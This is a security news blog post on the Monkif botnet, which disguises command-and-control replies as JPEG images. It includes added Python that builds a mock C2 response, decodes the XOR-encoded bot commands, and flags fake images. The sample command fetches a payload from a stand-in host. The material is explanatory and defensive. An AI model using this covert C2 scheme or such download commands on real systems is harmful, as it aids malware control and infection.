September 30th, 2009

New botnet hides commands as JPEG images

Posted by Ryan Naraine @ 6:08 am

Categories: Anti Virus, Arbitrary Code Execution, Botnets, Browsers, Complex Attacks, Data theft, Malware, Passwords, Phishing, Spam and Phishing, Spyware and Adware, Viruses and Worms

Tags: JPEG, Trojan Horse, Bot, Spyware, Adware & Malware, Spyware, Viruses And Worms, Security, Ryan Naraine

Security researchers have stumbled on a new botnet that uses an interesting technique to mask its nefarious intentions.

The Monkif/DIKhora botnet, which is pushing Trojan downloaders to infected machines, encodes its instructions so that the command-and-control server's reply looks, at the HTTP level, like a JPEG image file, according to SecureWorks researcher Jason Milletary. No real image is involved: the response is a fake JPEG header followed by trivially obfuscated text, which is enough to fool a cursory look at the traffic but not a check of the payload itself.

Milletary explains:

The server sets the HTTP Content-Type header to "image/jpeg" and prefaces the bot commands with a fake 32-byte JPEG header. The bot checks if the header matches and decodes the rest of the response to retrieve its commands. The commands are encoded using a single byte XOR with 0x4. The malware that CTU has observed being installed by Monkif is a BHO (Browser Helper Object) trojan commonly referred to as ExeDot, which performs Ad Hijacking and Ad Clicking.

The Trojan associated with this botnet also attempts to disable anti-virus and personal firewall software to maintain its foothold on the system.
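The exchange Milletary describes can be reproduced and, more usefully, detected on the wire with a few lines of code. The following is an added example written for this page, not code from the article, SecureWorks or the malware itself. It assumes the fake 32-byte header begins with a JPEG SOI marker and is otherwise padding (the article does not give the real header bytes), that commands are ASCII text, and that the XOR key is the single byte 0x04 as quoted. The sample HTTP response, the command string and the 198.51.100.7 address are constructed for the example.

```python
"""Added example: decode and detect a Monkif-style 'JPEG' C2 response.

Assumptions (not stated in the article, chosen for illustration):
  * the 32-byte fake header starts with a JPEG SOI marker (FF D8 FF E0)
    and is zero-padded; the real bot's header bytes are not public here
  * bot commands are ASCII text, XOR-encoded with the single byte 0x04
"""
from typing import Optional, Tuple

XOR_KEY = 0x04           # single-byte XOR key quoted in the article
FAKE_HEADER_LEN = 32     # length of the fake JPEG header quoted in the article

# Assumed fake header: SOI + APP0 marker bytes, then padding.
FAKE_JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * (FAKE_HEADER_LEN - 4)


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR is its own inverse, so this also encodes."""
    return bytes(b ^ key for b in data)


def build_c2_response(commands: bytes) -> bytes:
    """Constructed server side: fake header + XOR-encoded commands, wrapped
    in a minimal HTTP/1.1 response claiming to be a JPEG."""
    body = FAKE_JPEG_HEADER + xor_decode(commands)
    head = (
        b"HTTP/1.1 200 OK\r\n"
        b"Content-Type: image/jpeg\r\n"
        + b"Content-Length: %d\r\n\r\n" % len(body)
    )
    return head + body


def split_http_response(raw: bytes) -> Tuple[str, bytes]:
    """Return (content-type, body) from a raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    content_type = ""
    for line in head.split(b"\r\n")[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-type":
            content_type = value.strip().decode("ascii", "replace").lower()
    return content_type, body


def decode_bot_commands(body: bytes) -> Optional[bytes]:
    """Mimic the bot: accept only bodies with the expected fake header,
    then XOR-decode everything after it."""
    if len(body) < FAKE_HEADER_LEN or body[:FAKE_HEADER_LEN] != FAKE_JPEG_HEADER:
        return None
    return xor_decode(body[FAKE_HEADER_LEN:])


def looks_like_complete_jpeg(body: bytes) -> bool:
    """A real, complete JPEG starts with SOI (FF D8) and ends with EOI (FF D9)."""
    return body[:2] == b"\xff\xd8" and body[-2:] == b"\xff\xd9"


def printable_ratio(data: bytes) -> float:
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def classify_image_response(raw: bytes) -> str:
    """Detection heuristic for a proxy or IDS:
    'ok'               - not image/jpeg, or a structurally complete JPEG
    'not-jpeg'         - claims image/jpeg but lacks SOI/EOI framing
    'xor-encoded-text' - as above, and the bytes after the 32-byte header
                         become almost entirely printable under XOR 0x04
    """
    content_type, body = split_http_response(raw)
    if content_type != "image/jpeg" or looks_like_complete_jpeg(body):
        return "ok"
    tail = body[FAKE_HEADER_LEN:]
    if tail and printable_ratio(xor_decode(tail)) > 0.9:
        return "xor-encoded-text"
    return "not-jpeg"


# Constructed samples for a stand-alone run.
SAMPLE_COMMANDS = b"download http://198.51.100.7/dl/exedot.bin\n"   # constructed
SAMPLE_C2_RESPONSE = build_c2_response(SAMPLE_COMMANDS)
REAL_JPEG_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(range(256)) + b"\xff\xd9"
)

if __name__ == "__main__":
    _, body = split_http_response(SAMPLE_C2_RESPONSE)
    print("bot would execute:", decode_bot_commands(body))
    print("C2 sample   :", classify_image_response(SAMPLE_C2_RESPONSE))
    print("real JPEG   :", classify_image_response(REAL_JPEG_RESPONSE))
```

The point of the second half is that a Content-Type header proves nothing: a sensor that actually checks JPEG framing, or tries the one-byte XOR the bot is known to use, separates these responses from genuine images immediately. The EOI check will also flag truncated image downloads, so in production it should be combined with the decoded-text test or a full JPEG parse rather than used alone, and a key other than 0x04 would need a small brute force over all 256 single-byte keys.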


Ryan Naraine is a journalist and security evangelist at Kaspersky Lab. He manages Threatpost.com, a security news portal.



Talkback (most recent of 48):

Huh? The "defenses" are not to join the botnet. Did you even RTFA? If you did, you would know there's nothing "fearful" about it. Instead of the botnet being administered with plain text commands, it's being administered with plain text commands prefi... (Read the rest)

Posted by: AzuMao | 10/07/09
